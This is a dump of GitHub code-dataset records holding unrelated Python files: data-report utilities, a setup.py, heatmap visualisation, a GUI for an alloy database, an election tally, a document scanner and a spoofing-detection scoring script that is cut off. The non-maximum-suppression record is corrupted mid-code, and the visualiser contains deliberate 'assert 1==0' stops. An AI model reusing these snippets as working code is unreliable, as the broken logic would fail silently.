\"\"\"For the columns in the 'combo_cols' list calculate all possible combinations of the columns unique values\n\n \"\"\"\n lists_for_prod = list()\n self._set_combo_columns()\n for col in self.combo_cols:\n unique_values = list(self.input_df[col].unique())\n lists_for_prod.append(unique_values)\n return itertools.product(*lists_for_prod)\n\n def _determine_multi_column_filters(self):\n \"\"\"For the values / columns combinations already generated and found in 'input_df' check that is exists in\n the 'final_df' and that it appears often, if so it is added to a DF for post in the report.\n\n \"\"\"\n resulting_catego_df = self.final_df[self.combo_cols].drop_duplicates()\n combos_to_exclude = list()\n for combo_row in self.combos_to_check_in_final:\n if isin_row(combo_row, resulting_catego_df):\n combos_to_exclude.append(combo_row)\n self.combos_to_exclude = pd.concat(combos_to_exclude)\n\n def _set_combo_columns(self):\n \"\"\"If the number of combinations is larger than 'MULTIPLE_COMBINATION_FILTERS' in take out the column with the\n must unique values and calculate the number of combinations again, until the number is bellow the threshold.\n\n :return:\n \"\"\"\n for col in self.input_df.columns:\n if self._is_natural_divider(self.input_df[col]):\n self.combo_cols.update({col: len(self.input_df[col].unique())})\n number_of_combinations = reduce(lambda x, y: x * y, self.combo_cols.values())\n while number_of_combinations > MULTIPLE_COMBINATION_FILTERS:\n max_key = max(self.combo_cols.items(), key=operator.itemgetter(1))[0]\n del self.combo_cols[max_key]\n number_of_combinations = reduce(lambda x, y: x * y, self.combo_cols.values())\n self.combo_cols = list(self.combo_cols.keys())\n","repo_name":"carlosjpc/Pandas-Report-Tracer","sub_path":"pandas_report_tracer/utils/columns_to_work_with.py","file_name":"columns_to_work_with.py","file_ext":"py","file_size_in_byte":21067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"39591741458","text":"from setuptools import setup, find_packages\n\ntry:\n from numpy.distutils.core import setup\nexcept:\n from distutils.core import setup\n\nwith open('README.md') as f:\n readme = f.read()\n\nwith open('LICENSE') as f:\n license = f.read()\n\n\ndef configuration(parent_package='', top_path=None):\n from numpy.distutils.misc_util import Configuration\n config = Configuration(None, parent_package, top_path)\n config.set_options(ignore_setup_xxx_py=True,\n assume_default_configuration=True,\n delegate_options_to_subpackages=True,\n quiet=True)\n\n config.add_subpackage('msgr')\n config.add_subpackage('msgr.core')\n config.add_subpackage('msgr.core.instruments')\n config.add_subpackage('msgr.core.io')\n\n return config\n\nsetup(\n name='msgr',\n version='0.5',\n description='Matching Satellite and Ground Radar',\n long_description=readme,\n author='Valentin Louf',\n author_email='valentin.louf@bom.gov.au',\n url='https://gitlab.bom.gov.au/vlouf/Matchproj-python',\n license=license,\n packages=find_packages(exclude=('config', 'docs')),\n configuration=configuration,\n scripts=['scripts/matchvol', 'scripts/generate_config_matchvol']\n)\n","repo_name":"vlouf/matchproj","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"56"} +{"seq_id":"14147698646","text":"import os\nimport cv2\nimport math\nimport torch\nimport numpy as np\nfrom pyheatmap.heatmap import HeatMap\n\n\ndef vis_salient_patch(b_pos_sim, b_sim_12, b_imgs, labels, id2clss, iteration, epoch, save_dir):\n \"\"\"\n pos_sim: b, p_num\n imgs: b, 2, T, C, H, W\n labels: b\n \"\"\"\n batchsize = labels.shape[0]\n for b in range(batchsize):\n clss = id2clss[labels[b].item()]\n imgs = b_imgs[b]\n sim_11 = b_pos_sim[b].reshape(8, -1) # p_num = T, 49+16+4\n sim_12 = b_sim_12[b].reshape(8, -1)\n\n # sim_12 -> img2\n # sim_11 -> img1\n imgs1 = imgs[0] # 3, 224, 224 \n imgs2 = imgs[1]\n\n img1 = heatmap(imgs1, sim_11)\n img2 = heatmap(imgs2, sim_12)\n\n H, W, C = img1.shape\n img = np.zeros([H*2, W, C])\n img[:H, :, :] = img1\n img[H:, :, :] = img2\n \n img_name = '%d_%d_%d_%s.jpg'%(epoch, iteration, b, clss)\n if not os.path.exists('data/vis/%s'%save_dir):\n os.makedirs('data/vis/%s'%save_dir)\n cv2.imwrite('data/vis/%s/%s'%(save_dir, img_name), img)\n assert 1==0\n\ndef heatmap(imgs, sims):\n \"\"\"\n img: T, 3, H, W\n sim: T, 49+16+4\n \"\"\"\n print(imgs[0])\n print(sims[0])\n assert 1==0\n scale = [1, 2, 4]\n stride = [1, 2, 4]\n T = imgs.shape[0]\n htmaps = []\n for t in range(T):\n img = imgs[t] # C, H, W\n _, H, W = img.shape\n assert H==W\n sim = sims[t] # 49+16+4\n weights = []\n total_num = 0\n\n for i in range(3): # 3 scales\n num = math.ceil(7/stride[i])**2\n _sim = sim[total_num:total_num+num]\n total_num += num\n\n sim_len = math.ceil(H/7)*scale[i]\n _weights = torch.zeros([H, W])\n start_h = 0\n for k in range(num):\n start_w = 0\n for j in range(num): \n _weights[start_h:min(H, start_h+sim_len), start_w:min(W, start_w+sim_len)]\n start_w += min(W, int(sim_len/stride[i]))\n start_h += min(H, int(sim_len/stride[i]))\n \n\n weights.append(_weights)\n\n weights = torch.stack(weights) # 3, H, W\n weights, _ = torch.max(weights, dim=0) # H, W\n weights = weights.cpu().numpy()\n\n htmap = draw_heatmap(weights)\n htmaps.append(htmap)\n \n # concat all images and heatmap into a big image\n img = concat_htmaps(imgs, htmaps)\n\n return img\n\n\ndef draw_heatmap(weights):\n \"\"\"\n weights: H x W\n \"\"\"\n pmin = np.min(weights)\n pmax = np.max(weights)\n weights = ((weights - pmin) / (pmax - pmin + 0.000001))*255 \n weights = weights.astype(np.uint8)\n weights = cv2.applyColorMap(weights, cv2.COLORMAP_JET)\n return weights\n\n\ndef concat_htmaps(imgs, htmaps):\n \"\"\"\n imgs: T, 3, H, W\n htmaps: T, H, W\n \"\"\"\n T, C, H, W = imgs.shape\n imgs = imgs.permute(0, 2, 3, 1)\n imgs = imgs.numpy()\n img = np.zeros([H*2, W*T, C])\n\n for i in range(T):\n img[:H, W*i:W*(i+1), :] = imgs[i]\n img[H:, W*i:W*(i+1), :] = htmaps[i]\n\n return img\n\n\n#def transform_invert(img, transform_train):\n# \"\"\"\n# \n# \"\"\"","repo_name":"zhengsipeng/HCL-FSAR","sub_path":"utils/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"56"} +{"seq_id":"34452023081","text":"import nscmd\n\nclass FooInterpreter(nscmd.SubInterpreter):\n name = 'foo'\n\n def do_helloworld(self, args):\n \"\"\"prints Hello, foo!\"\"\"\n return \"Hello, foo!\"\n\nif __name__ == \"__main__\":\n\n # JIT imports allow for multi-file interpreters\n from bar import BarInterpreter\n\n # run commands from a list...\n cmds = [\"main foo\",\"helloworld\",\"main foo bar helloworld\"]\n m = nscmd.MainInterpreter(cmd_in=cmds)\n m.run()\n # ... and get the results in a list!\n print(nscmd.outqueue)\n\n # ... or use files for input and output\n m = nscmd.MainInterpreter(\n cmd_in=\"example_cmds.txt\",\n outfile=\"example_output.txt\"\n )\n m.run()\n\n # Use a string!\n cmdstr = \"main foo\\nhelloworld\\nmain foo bar helloworld\\n\"\n m = nscmd.MainInterpreter(\n cmd_in=cmdstr\n )\n m.run()\n print(nscmd.outqueue)\n\n # or run as a standard TUI\n m = nscmd.MainInterpreter()\n m.tui()\n\n # no matter what method you use, you can still access\n # the output as a list. It resets on each instantiation.\n print(nscmd.outqueue)\n","repo_name":"ropbear/nscmd","sub_path":"example/foo.py","file_name":"foo.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"41092624270","text":"import PySimpleGUI as sg\nfrom requests import post\nfrom urls import urls\n\n\nclass WinOne():\n '''Конструктор Class'''\n def __init__(self, status):\n self.status = status\n\n '''Переменные класса'''\n kod = ['find']\n kod1 = ['update']\n keys = ['nameAlloy', 'discript', 'tu_Gost']\n keysForServer = ['kod', 'nameAlloy']\n lenRasdelLine = 50 # Кол-во символов\n\n '''Основная функция класса'''\n def openwin(self, wind):\n\n if self.status == 'add':\n '''Цвет темы'''\n sg.theme('LightPurple')\n '''Запуск основногоо окна'''\n window = sg.Window('Первое окно', self.layout())\n self.controlAdd(window, wind)\n\n if self.status == 'read':\n #print('Второе окно')\n '''Цвет темы'''\n sg.theme('LightPurple')\n '''Запуск основногоо окна'''\n window = sg.Window('Первое окно', self.layoutTwo())\n self.controlAdd(window, wind)\n\n '''Функция закрытия текущего окна и открытия главного'''\n def colseWin(self, wind,window):\n window.close()\n wind.UnHide()\n #print('Работает Закрытие Первого окна')\n\n '''Функция Очистки полей'''\n def cleanFild(self, window):\n for key in self.keys:\n window[key].update('')\n\n '''Функция проверяет заполнение всех полей и ставит название марки в заглавный вид'''\n def dataUp(self, window, values):\n flag = 1\n for key in self.keys:\n if values[key] == '':\n window['-info-'].update('Заполните все поля!!!', text_color='red')\n flag = 0\n\n if flag == 1:\n textUp = values[self.keys[0]]\n textUp = textUp.upper()\n values.update({self.keys[0]: textUp})\n #print(values)\n return values\n\n '''Функция записывает данные в БД'''\n def sendData(self, url, data, window):\n try:\n r = post(url, data)\n message = r.json()\n resMessage = message['numRecord']\n if resMessage != '':\n if resMessage == 'Есть такой элемент':\n window['-info-'].update('Есть такой элемент', text_color='red')\n else:\n window['-info-'].update('Запись успешно занесена в БД', text_color='green')\n self.cleanFild(window)\n return resMessage\n except:\n window['-info-'].update('Нет соединения с БД')\n\n\n def layout(self):\n layout = [[sg.Text('Наименование Марки')],\n [sg.InputText(key=self.keys[0], size=(50, 1))],\n [sg.Text('Описание Марки')],\n [sg.InputText(key=self.keys[1], size=(50, 50))],\n [sg.Text('Гост или ТУ')],\n [sg.InputText(key=self.keys[2], size=(50, 1))],\n [sg.Text('_' * self.lenRasdelLine)],\n [sg.Text('', key='-info-', text_color='red', size=(50, 1))],\n [sg.Button('Добавить запись', key='-add-'), sg.Button('Очистить поля', key='-clean-'),\n sg.Button('Выход', key='-exit-')]\n ]\n return layout\n\n\n\n\n\n\n '''Функция управления окном в статусе Add'''\n\n def controlAdd(self, window, wind):\n while True:\n event, values = window.Read()\n if event in (None, '-exit-'):\n if wind != 'test':\n self.colseWin(wind, window)\n break\n\n ''' Очисщаем поля'''\n if event == '-clean-':\n self.cleanFild(window)\n #print('Очистка Полей')\n\n ''' Добавляем запись'''\n if event == '-add-':\n values['kod'] = 'add'\n #print(values)\n newData = self.dataUp(window, values)\n # print(newData)\n if newData != None:\n self.sendData(urls['alloy_input'], newData, window)\n\n ''' Корекция записи'''\n if event == '-up-':\n res = self.korect(values)\n if res=='ok update':\n window['-info-'].update('Корекция прошла успешно ', text_color='green')\n elif res == 'Нет соединения с сервером!':\n window['-info-'].update(res, text_color='red')\n elif res == 'Заполните все поля !':\n window['-info-'].update(res, text_color='red')\n else:\n window['-info-'].update('Корекция не прошла !', text_color='red')\n\n\n","repo_name":"MikeNordMan/Alloys_block","sub_path":"windowOne.py","file_name":"windowOne.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"74395066415","text":"import sys\n\n# Add the parent folder path to the sys.path list\nsys.path.append('../')\n\n# Now you can import your module\n# pylint: disable=import-error\nimport common\n\ncommon.echo(\"start\")\n\nwith open(\"input\\\\test.txt\") as file:\n line = file.readline()\n count = 1\n while line:\n print(\"Line {}: {}\".format(count, line.strip()))\n value = int(line.strip())\n line = file.readline()\n count += 1\n\ncommon.echo(\"end\")\n","repo_name":"cfpaperdragon/advent-of-code-2020","sub_path":"Day01/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"33934305751","text":"import numpy as np\n\ndef nms(bboxes, score_threshold, iou_threshold, sigma=0.3, method='nms'):\n classes = {}\n for bbox in bboxes:\n if bbox[4]x2 or y3>y2:\n return 0\n else:\n i = (y2-y3)*(x3-x2)\n u = (y2-y1)*(x2-x1) + (y4-y3)*(x4-x3) - i\n return i/u","repo_name":"bhushanap/CPquestions","sub_path":"NonMaxSupression/NMS.py","file_name":"NMS.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"27531417045","text":"#import Dependencies\nimport os\nimport csv\n\n#Open file path\ncsvpath = os.path.join( 'Resources','election_data.csv')\n\n#defining variables\ntotal_vote_counter = 0\n\ncandidates = []\n\nkhan_counter = 0\ncorrey_counter = 0\nli_counter = 0\notooley_counter = 0\n\ncandidates_percentages = []\n\n#open the csv\nwith open(csvpath, 'r') as csvfile:\n csvreader = csv.reader(csvfile, delimiter = ',')\n\n #set header row\n csvheader = next(csvfile)\n\n #start loop\n for row in csvreader:\n #Total Votes\n if row[0] != \" \":\n total_vote_counter = total_vote_counter + 1\n #List of unique candidates\n if row[2] not in candidates:\n candidates.append(row[2])\n #Votes for each candidate\n if row[2] == \"Khan\":\n khan_counter = khan_counter + 1\n if row[2] == \"Correy\":\n correy_counter = correy_counter + 1\n if row[2] == \"Li\":\n li_counter = li_counter + 1\n if row[2] == \"O'Tooley\":\n otooley_counter = otooley_counter + 1\n \n #calculate after loop, calculate percent, add value to empty list\n khan_percent = round(((khan_counter / total_vote_counter) * 100), 3)\n candidates_percentages.append(khan_percent)\n \n correy_percent = round(((correy_counter / total_vote_counter) * 100), 3)\n candidates_percentages.append(correy_percent)\n \n li_percent = round(((li_counter / total_vote_counter) * 100), 3)\n candidates_percentages.append(li_percent)\n \n otooley_percent = round(((otooley_counter / total_vote_counter) * 100), 3)\n candidates_percentages.append(otooley_percent)\n\n #Identify max value (max percent) to identify the winner\n percent_max = max(candidates_percentages)\n #Identify the max value index\n percent_max_index = candidates_percentages.index(percent_max)\n #Identify winning candidate by finding matching candidate to index\n winner = candidates[percent_max_index]\n\nprint(\"Election Results\")\nprint(\"-------------------------------\")\nprint(\"Total Votes: \" + str(total_vote_counter))\nprint(\"-------------------------------\")\nprint(str(candidates[0]) + \": \" + str(khan_percent) + \"% \" + \"(\" + str(khan_counter) + \")\")\nprint(str(candidates[1]) + \": \" + str(correy_percent) + \"% \" + \"(\" + str(correy_counter) + \")\")\nprint(str(candidates[2]) + \": \" + str(li_percent) + \"% \" + \"(\" + str(li_counter) + \")\")\nprint(str(candidates[3]) + \": \" + str(otooley_percent) + \"% \" + \"(\" + str(otooley_counter) + \")\")\nprint(\"-------------------------------\")\nprint(\"Winner: \" + str(winner))\nprint(\"-------------------------------\")\n\n#Print out Text File\n#Specify the file to write to\ntxt_results = os.path.join (\"analysis\", \"PyPollResults.txt\")\n\n#Open and write file\nwith open(txt_results, \"w\") as text_file:\n text_file.write(\"Election Results \\n\")\n text_file.write(\"------------------------------- \\n\")\n text_file.write(\"Total Votes: \" + str(total_vote_counter) + \"\\n\")\n text_file.write(\"------------------------------- \\n\")\n text_file.write(str(candidates[0]) + \": \" + str(khan_percent) + \"% \" + \"(\" + str(khan_counter) + \")\" + \"\\n\")\n text_file.write(str(candidates[1]) + \": \" + str(correy_percent) + \"% \" + \"(\" + str(correy_counter) + \")\" + \"\\n\")\n text_file.write(str(candidates[2]) + \": \" + str(li_percent) + \"% \" + \"(\" + str(li_counter) + \")\" + \"\\n\")\n text_file.write(str(candidates[3]) + \": \" + str(otooley_percent) + \"% \" + \"(\" + str(otooley_counter) + \")\" + \"\\n\")\n text_file.write(\"------------------------------- \\n\")\n text_file.write(\"Winner: \" + str(winner) + \"\\n\")\n text_file.write(\"------------------------------- \\n\")\n","repo_name":"josh-acampado/python_challenge","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"44864779055","text":"import cv2\r\nimport numpy as np\r\n\r\ndef order_points(pts):\r\n # Order the points in the top-left, top-right, bottom-right, and bottom-left order\r\n rect = np.zeros((4, 2), dtype=\"float32\")\r\n s = np.sum(pts, axis=1)\r\n\r\n rect[0] = pts[np.argmin(s)]\r\n rect[2] = pts[np.argmax(s)]\r\n\r\n diff = np.diff(pts, axis=1)\r\n rect[1] = pts[np.argmin(diff)]\r\n rect[3] = pts[np.argmax(diff)]\r\n\r\n return rect\r\n\r\ndef four_point_transform(image, pts):\r\n rect = order_points(pts)\r\n (tl, tr, br, bl) = rect\r\n\r\n # Calculate the width of the new image\r\n widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\r\n widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\r\n maxWidth = max(int(widthA), int(widthB))\r\n\r\n # Calculate the height of the new image\r\n heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\r\n heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\r\n maxHeight = max(int(heightA), int(heightB))\r\n\r\n # Set the destination points for the perspective transform\r\n dst = np.array([[0, 0], [maxWidth - 1, 0], [maxWidth - 1, maxHeight - 1], [0, maxHeight - 1]], dtype=\"float32\")\r\n\r\n # Compute the perspective transform matrix and apply it\r\n M = cv2.getPerspectiveTransform(rect, dst)\r\n warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\r\n\r\n return warped\r\n\r\n# Load the image\r\nimage = cv2.imread('input_image.jpg')\r\n\r\n# Resize the image for better display\r\nimage = cv2.resize(image, (800, 800))\r\n\r\n# Convert the image to grayscale\r\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n\r\n# Apply Gaussian blur to reduce noise\r\nblurred = cv2.GaussianBlur(gray, (5, 5), 0)\r\n\r\n# Perform Canny edge detection\r\nedges = cv2.Canny(blurred, 50, 150)\r\n\r\n# Find contours in the edge map\r\ncontours, _ = cv2.findContours(edges.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n# Sort the contours by area in descending order\r\ncontours = sorted(contours, key=cv2.contourArea, reverse=True)\r\n\r\n# Iterate through the contours and find the document contour\r\nfor contour in contours:\r\n # Approximate the contour with a polygon\r\n perimeter = cv2.arcLength(contour, True)\r\n approx = cv2.approxPolyDP(contour, 0.02 * perimeter, True)\r\n\r\n # If the approximated polygon has four points, assume it is the document contour\r\n if len(approx) == 4:\r\n document_contour = approx\r\n break\r\n\r\n# Perform perspective transform to obtain the scanned image\r\nscanned_image = four_point_transform(image, document_contour.reshape(4, 2))\r\n\r\n# Display the original and scanned images\r\ncv2.imshow(\"Original Image\", image)\r\ncv2.imshow(\"Scanned Image\", scanned_image)\r\n\r\n# Save the scanned image\r\ncv2.imwrite(\"scanned_image.jpg\", scanned_image)\r\n\r\n# Wait for key press and then close the windows\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"zi524/task-cv","sub_path":"3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"27307762372","text":"import argparse\nimport numpy as np\nimport glob\nimport torch\nimport torch.nn.functional as F\nimport os\nfrom kaldi_io import read_mat_scp\nimport model as model_\nimport scipy.io as sio\n\nfrom utils import *\n\ndef prep_feats(data_):\n\n\t#data_ = ( data_ - data_.mean(0) ) / data_.std(0)\n\n\tfeatures = data_.T\n\n\tif features.shape[1]<50:\n\t\tmul = int(np.ceil(50/features.shape[1]))\n\t\tfeatures = np.tile(features, (1, mul))\n\t\tfeatures = features[:, :50]\n\n\treturn torch.from_numpy(features[np.newaxis, np.newaxis, :, :]).float()\n\nif __name__ == '__main__':\n\n\tparser = argparse.ArgumentParser(description='Compute scores')\n\tparser.add_argument('--path-to-data-la', type=str, default='./data_la/feats.scp', metavar='Path', help='Path to input data')\n\tparser.add_argument('--path-to-data-pa', type=str, default='./data_pa/feats.scp', metavar='Path', help='Path to input data')\n\tparser.add_argument('--path-to-data-mix', type=str, default='./data_mix/feats.scp', metavar='Path', help='Path to input data')\n\tparser.add_argument('--model-la', choices=['lstm', 'resnet', 'resnet_pca', 'wideresnet', 'lcnn_9', 'lcnn_29', 'lcnn_9_pca', 'lcnn_29_pca', 'lcnn_9_prodspec', 'lcnn_9_icqspec', 'lcnn_9_CC', 'lcnn_29_CC', 'resnet_CC', 'Linear', 'TDNN', 'TDNN_multipool', 'TDNN_LSTM', 'FTDNN', 'mobilenet', 'densenet', 'VGG'], default='lcnn_29_CC', help='Model arch')\n\tparser.add_argument('--model-pa', choices=['lstm', 'resnet', 'resnet_pca', 'wideresnet', 'lcnn_9', 'lcnn_29', 'lcnn_9_pca', 'lcnn_29_pca', 'lcnn_9_prodspec', 'lcnn_9_icqspec', 'lcnn_9_CC', 'lcnn_29_CC', 'resnet_CC', 'Linear', 'TDNN', 'TDNN_multipool', 'TDNN_LSTM', 'FTDNN', 'mobilenet', 'densenet', 'VGG'], default='lcnn_9_prodspec', help='Model arch')\n\tparser.add_argument('--model-mix', choices=['lstm', 'resnet', 'resnet_pca', 'wideresnet', 'lcnn_9', 'lcnn_29', 'lcnn_9_pca', 'lcnn_29_pca', 'lcnn_9_prodspec', 'lcnn_9_icqspec', 'lcnn_9_CC', 'lcnn_29_CC', 'resnet_CC', 'Linear', 'TDNN', 'TDNN_multipool', 'FTDNN', 'TDNN_LSTM', 'mobilenet', 'densenet', 'VGG'], default='lcnn_29_CC', help='Model arch')\n\tparser.add_argument('--vgg-type-la', choices=['VGG11', 'VGG13', 'VGG16', 'VGG19'], default='VGG16', help='VGG arch')\n\tparser.add_argument('--vgg-type-pa', choices=['VGG11', 'VGG13', 'VGG16', 'VGG19'], default='VGG16', help='VGG arch')\n\tparser.add_argument('--vgg-type-mix', choices=['VGG11', 'VGG13', 'VGG16', 'VGG19'], default='VGG16', help='VGG arch')\n\tparser.add_argument('--resnet-type-la', choices=['18', '28', '34', '50', '101', 'se_18', 'se_28', 'se_34', 'se_50', 'se_101', '2net_18', '2net_se_18'], default='18', help='Resnet arch')\n\tparser.add_argument('--resnet-type-pa', choices=['18', '28', '34', '50', '101', 'se_18', 'se_28', 'se_34', 'se_50', 'se_101', '2net_18', '2net_se_18'], default='18', help='Resnet arch')\n\tparser.add_argument('--resnet-type-mix', choices=['18', '28', '34', '50', '101', 'se_18', 'se_28', 'se_34', 'se_50', 'se_101', '2net_18', '2net_se_18'], default='18', help='Resnet arch')\n\tparser.add_argument('--train-mode', choices=['mix', 'lapa', 'independent'], default='mix', help='Train mode')\n\tparser.add_argument('--trials-path', type=str, default=None, metavar='Path', help='Path to trials file')\n\tparser.add_argument('--cp-path', type=str, default=None, metavar='Path', help='Path for file containing model')\n\tparser.add_argument('--out-path', type=str, default='./', metavar='Path', help='Path to output hdf file')\n\tparser.add_argument('--prefix', type=str, default='./scores', metavar='Path', help='prefix for score files names')\n\tparser.add_argument('--no-cuda', action='store_true', default=False, help='Disables GPU use')\n\tparser.add_argument('--no-output-file', action='store_true', default=False, help='Disables writing scores into out file')\n\tparser.add_argument('--no-eer', action='store_true', default=False, help='Disables computation of EER')\n\tparser.add_argument('--eval', action='store_true', default=False, help='Enables eval trials reading')\n\tparser.add_argument('--ncoef-la', type=int, default=90, metavar='N', help='Number of cepstral coefs for the CC case (default: 90)')\n\tparser.add_argument('--ncoef-pa', type=int, default=90, metavar='N', help='Number of cepstral coefs for the CC case (default: 90)')\n\tparser.add_argument('--ncoef-mix', type=int, default=90, metavar='N', help='Number of cepstral coefs for the CC case (default: 90)')\n\targs = parser.parse_args()\n\targs.cuda = True if not args.no_cuda and torch.cuda.is_available() else False\n\n\tprint(args)\n\n\tif args.cp_path is None:\n\t\traise ValueError('There is no checkpoint/model path. Use arg --cp-path to indicate the path!')\n\n\tif os.path.isfile(args.out_path):\n\t\tos.remove(args.out_path)\n\t\tprint(args.out_path + ' Removed')\n\n\tif args.cuda:\n\t\tdevice = get_freer_gpu()\n\n\tif args.model_la == 'lstm':\n\t\tmodel_la = model_.cnn_lstm()\n\telif args.model_la == 'VGG':\n\t\tmodel_la = model_.VGG(vgg_name=args.vgg_type_la)\n\telif args.model_la == 'resnet':\n\t\tmodel_la = model_.ResNet(resnet_type=args.resnet_type_la)\n\telif args.model_la == 'resnet_pca':\n\t\tmodel_la = model_.ResNet_pca(resnet_type=args.resnet_type_la)\n\telif args.model_la == 'wideresnet':\n\t\tmodel_la = model_.WideResNet()\n\telif args.model_la == 'lcnn_9':\n\t\tmodel_la = model_.lcnn_9layers()\n\telif args.model_la == 'lcnn_29':\n\t\tmodel_la = model_.lcnn_29layers_v2()\n\telif args.model_la == 'lcnn_9_pca':\n\t\tmodel_la = model_.lcnn_9layers_pca()\n\telif args.model_la == 'lcnn_29_pca':\n\t\tmodel_la = model_.lcnn_29layers_v2_pca()\n\telif args.model_la == 'lcnn_9_icqspec':\n\t\tmodel_la = model_.lcnn_9layers_icqspec()\n\telif args.model_la == 'lcnn_9_prodspec':\n\t\tmodel_la = model_.lcnn_9layers_prodspec()\n\telif args.model_la == 'lcnn_9_CC':\n\t\tmodel_la = model_.lcnn_9layers_CC(ncoef=args.ncoef_la)\n\telif args.model_la == 'lcnn_29_CC':\n\t\tmodel_la = model_.lcnn_29layers_CC(ncoef=args.ncoef_la)\n\telif args.model_la == 'resnet_CC':\n\t\tmodel_la = model_.ResNet_CC(ncoef=args.ncoef_la, resnet_type=args.resnet_type_la)\n\telif args.model_la == 'TDNN':\n\t\tmodel_la = model_.TDNN(ncoef=args.ncoef_la)\n\telif args.model_la == 'TDNN_multipool':\n\t\tmodel_la = model_.TDNN_multipool(ncoef=args.ncoef_la)\n\telif args.model_la == 'TDNN_LSTM':\n\t\tmodel_la = model_.TDNN_LSTM(ncoef=args.ncoef_la)\n\telif args.model_la == 'FTDNN':\n\t\tmodel_la = model_.FTDNN(ncoef=args.ncoef_la)\n\telif args.model_la == 'Linear':\n\t\tmodel_la = model_.Linear(ncoef=args.ncoef_la)\n\telif args.model_la == 'mobilenet':\n\t\tmodel_la = model_.MobileNetV3_Small()\n\telif args.model_la == 'densenet':\n\t\tmodel_la = model_.DenseNet()\n\n\tif args.model_pa == 'lstm':\n\t\tmodel_pa = model_.cnn_lstm()\n\telif args.model_pa == 'VGG':\n\t\tmodel_pa = model_.VGG(vgg_name=args.vgg_type_pa)\n\telif args.model_pa == 'resnet':\n\t\tmodel_pa = model_.ResNet(resnet_type=args.resnet_type_pa)\n\telif args.model_pa == 'resnet_pca':\n\t\tmodel_pa = model_.ResNet_pca(resnet_type=args.resnet_type_pa)\n\telif args.model_pa == 'wideresnet':\n\t\tmodel_pa = model_.WideResNet()\n\telif args.model_pa == 'lcnn_9':\n\t\tmodel_pa = model_.lcnn_9layers()\n\telif args.model_pa == 'lcnn_29':\n\t\tmodel_pa = model_.lcnn_29layers_v2()\n\telif args.model_pa == 'lcnn_9_pca':\n\t\tmodel_pa = model_.lcnn_9layers_pca()\n\telif args.model_pa == 'lcnn_29_pca':\n\t\tmodel_pa = model_.lcnn_29layers_v2_pca()\n\telif args.model_pa == 'lcnn_9_icqspec':\n\t\tmodel_pa = model_.lcnn_9layers_icqspec()\n\telif args.model_pa == 'lcnn_9_prodspec':\n\t\tmodel_pa = model_.lcnn_9layers_prodspec()\n\telif args.model_pa == 'lcnn_9_CC':\n\t\tmodel_pa = model_.lcnn_9layers_CC(ncoef=args.ncoef_pa)\n\telif args.model_pa == 'lcnn_29_CC':\n\t\tmodel_pa = model_.lcnn_29layers_CC(ncoef=args.ncoef_pa)\n\telif args.model_pa == 'resnet_CC':\n\t\tmodel_pa = model_.ResNet_CC(ncoef=args.ncoef_pa, resnet_type=args.resnet_type_pa)\n\telif args.model_pa == 'TDNN':\n\t\tmodel_pa = model_.TDNN(ncoef=args.ncoef_pa)\n\telif args.model_pa == 'TDNN_multipool':\n\t\tmodel_pa = model_.TDNN_multipool(ncoef=args.ncoef_pa)\n\telif args.model_pa == 'TDNN_LSTM':\n\t\tmodel_pa = model_.TDNN_LSTM(ncoef=args.ncoef_pa)\n\telif args.model_pa == 'FTDNN':\n\t\tmodel_pa = model_.FTDNN(ncoef=args.ncoef_pa)\n\telif args.model_pa == 'Linear':\n\t\tmodel_pa = model_.Linear(ncoef=args.ncoef_pa)\n\telif args.model_pa == 'mobilenet':\n\t\tmodel_pa = model_.MobileNetV3_Small()\n\telif args.model_pa == 'densenet':\n\t\tmodel_pa = model_.DenseNet()\n\n\tif args.model_mix == 'lstm':\n\t\tmodel_mix = model_.cnn_lstm()\n\telif args.model_mix == 'VGG':\n\t\tmodel_mix = model_.VGG(vgg_name=args.vgg_type_mix)\n\telif args.model_mix == 'resnet':\n\t\tmodel_mix = model_.ResNet(resnet_type=args.resnet_type_mix)\n\telif args.model_mix == 'resnet_pca':\n\t\tmodel_mix = model_.ResNet_pca(resnet_type=args.resnet_type_mix)\n\telif args.model_mix == 'wideresnet':\n\t\tmodel_mix = model_.WideResNet()\n\telif args.model_mix == 'lcnn_9':\n\t\tmodel_mix = model_.lcnn_9layers()\n\telif args.model_mix == 'lcnn_29':\n\t\tmodel_mix = model_.lcnn_29layers_v2()\n\telif args.model_mix == 'lcnn_9_pca':\n\t\tmodel_mix = model_.lcnn_9layers_pca()\n\telif args.model_mix == 'lcnn_29_pca':\n\t\tmodel_mix = model_.lcnn_29layers_v2_pca()\n\telif args.model_mix == 'lcnn_9_icqspec':\n\t\tmodel_mix = model_.lcnn_9layers_icqspec()\n\telif args.model_mix == 'lcnn_9_prodspec':\n\t\tmodel_mix = model_.lcnn_9layers_prodspec()\n\telif args.model_mix 